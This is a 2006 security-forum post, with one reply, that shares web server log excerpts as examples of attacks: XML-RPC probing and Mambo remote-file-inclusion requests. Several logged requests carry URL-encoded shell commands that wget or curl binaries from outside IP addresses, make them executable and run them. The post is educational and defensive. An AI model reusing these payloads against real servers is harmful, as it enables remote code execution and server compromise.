What does an HTTP attack look like?

Submitted by ken on Mon, 2006-04-03 08:02. General | Vulnerabilities

Posted for educational edification, here's a snipper from the AZSPF.ORG web server logs showing what I consider to be multiple attacks from the same source:

200.93.206.54 - - [03/Apr/2006:05:03:14 -0700] "POST /xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:18 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:25 -0700] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:29 -0700] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:30 -0700] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:31 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:36 -0700] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:41 -0700] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_co
ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange
;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;e
cho| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:42 -0700] "POST /xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:45 -0700] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_con
tent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;
chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;ec
ho| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:03:49 -0700] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
Config_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%2
0/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:04:04 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 200 260
200.93.206.54 - - [03/Apr/2006:05:04:16 -0700] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 200 260

What's in your log files?

» login or register to post comments

Very Nice!

Submitted by Geoff on Mon, 2006-04-03 16:04.

On a similar note someone posted these logs in March to seclists.org - http://seclists.org/lists/fulldisclosure/2006/Mar/0176.html

I would guess that the host scanning would show up at dshield as well!

> 83.84.14X.XXX - - [06/Mar/2006:18:18:17 -0500] "GET
> /articles/mambo/index2.php?_REQUEST[option]=com_content wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:18 -0500] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content wget%20163.24.84.10/chspsp;chmod%20744%20chspsp;./chspsp;echo%20YYY;echo|
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:19 -0500] "POST /xmlrpc.php
> HTTP /1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:20 -0500] "POST /blog/xmlrpc.php
> HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:21 -0500] "POST
> /blog/xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:22 -0500] "POST
> /blogs/xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:23 -0500] "POST
> /drupal/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:25 -0500] "POST
> /phpgroupware/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0
> (compatible; MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:26 -0500] "POST
> /wordpress/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:27 -0500] "POST /xmlrpc.php
> HTTP /1.1" 200 375 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:28 -0500] "POST
> /xmlrpc/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"
> 83.84.14X.XXX - - [06/Mar/2006:18:18:29 -0500] "POST
> /xmlsrv/xmlrpc.php HTTP /1.1" 404 8696 "-" "Mozilla/4.0 (compatible;
> MSIE 6.0; Windows NT 5.1;)"

Geoff

» login or register to post comments

Meeting Location

University of Advancing Technology
2625 W Baseline Rd
Tempe, AZ 85283
(602) 383-8228

Time and Frequency

4th Mondays 6:30 PM

Map from Google

Upcoming events

Security Practitioners' Forum (November 24, 2008) [Topic: TBD](event)(3 days)

AZ Security Practitioners' Forum

User login

ISC Infocon Status

Navigation

New forum topics

Active forum topics

Who's online

Main Menu

What does an HTTP attack look like?

Very Nice!

Meeting Location

Upcoming events

Events

Bruce Schneier's blog

Internet Storm Center

SecurityFix - Brian Krebs - Washington Post